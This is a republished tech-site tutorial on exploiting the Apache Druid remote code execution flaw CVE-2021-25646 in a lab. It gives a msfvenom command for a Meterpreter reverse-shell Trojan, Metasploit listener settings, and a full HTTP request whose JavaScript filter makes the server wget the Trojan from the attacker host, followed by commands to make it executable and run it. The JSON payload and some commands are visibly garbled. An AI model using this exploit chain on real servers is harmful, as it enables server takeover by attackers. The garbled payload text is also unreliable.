Shulou(Shulou.com)05/31 Report--

This article introduces how to use Apache Druid remote code execution vulnerability CVE-2021-25646 to upload Trojan programs, the content is very detailed, interested friends can refer to, hope to be helpful to you.

I. Overview of vulnerabilities 1.1 vulnerability background

Apache Druid is a column-oriented open source distributed data storage system written in Java, which aims to quickly obtain a large amount of event data and provide low-latency queries on top of the data.

Recently, Apache Druid officially released a security update to fix remote code execution vulnerabilities (CVE-2021-25646)

1.2 vulnerability description

Apache Druid contains the ability to perform JavaScript code provided by the user embedded in various types of requests. This feature applies to highly trusted environments and is disabled by default. However, in Druid 0.20.0 and earlier, an authenticated user can construct an incoming json string to control certain parameters to send a malicious request, forcing Druid to run user-supplied JavaScript code for the request. Due to the lack of authorization authentication by default in Apache Druid, an attacker can exploit this vulnerability to execute arbitrary code on the target machine and eventually gain control of the server.

1.3 use MSF to generate bouncing shell Trojan

The address of the attack aircraft used this time is 192.168.159.131 target aircraft address: 192.168.159.139

1. Use MSF to generate a Trojan that bounces shell. The command is: msfvenom-p linux/x64/meterpreter/reverse_tcp LHOST=192.168.159.131 LPORT=5555-f elf > reverse.elf

Note: the target plane I use here is a 64-bit system, so if you choose x64 attack load, 32-bit system can choose x86.

2. Use python to enable web service on the attack machine. The following wget command will be executed through the Apache Druid remote code execution vulnerability to download the reverse.elf file generated by msf from the newly built reverse.elf service provider.

3. Use MSF to open the listening module, and the command is:

Use exploit/multi/handler

Set payload linux/x64/meterpreter/reverse_tcp

Set lhost 192.168.159.131

Set lport 5555

Run

1.4 recurrence of vulnerabilities

1. Download the Druid0.19 version from https://github.com/apache/druid/releases/tag/druid-0.19.0, as shown below

2. Use docker to build the Druid vulnerability environment, extract the downloaded files, enter the druid-druid-0.19.0/distribution/docker path and use docker-compose up-d to build the vulnerability environment, and visit http://192.168.159.139:8888 after completion

3. Copy the following poc to the repeater module of burpsuit, and the final command in the attack payload is: wget http://192.168.159.131:888/reverse.elf. Download the bounce shell Trojan program to the target machine from the built web server.

POST / druid/indexer/v1/sampler HTTP/1.1

Host: 192.168.159.139:8888

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/json;charset=UTF-8

Content-Length: 931

{"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "inputSource": {"type": "http", "uris": ["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp"," "missingValue": "2010-01-01T00:00:00Z"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript"

"function": "function (value) {return java.lang.Runtime.getRuntime () .exec ('wget http://192.168.159.131:888/reverse.elf')}",

"dimension": "added"

"": {

"enabled": "true"

}

}

}

}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 50, "timeoutMs": 10000}

4. Give executable permission to reverse.elf malicious programs downloaded to the target machine, and the command is: chmod aquix reverse.elf.

5. Execute the reverse.elf program with the following command:. / reverse.elf

6. Msf successfully received the rebounded shell

II. Scope of influence

Apache Druid

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.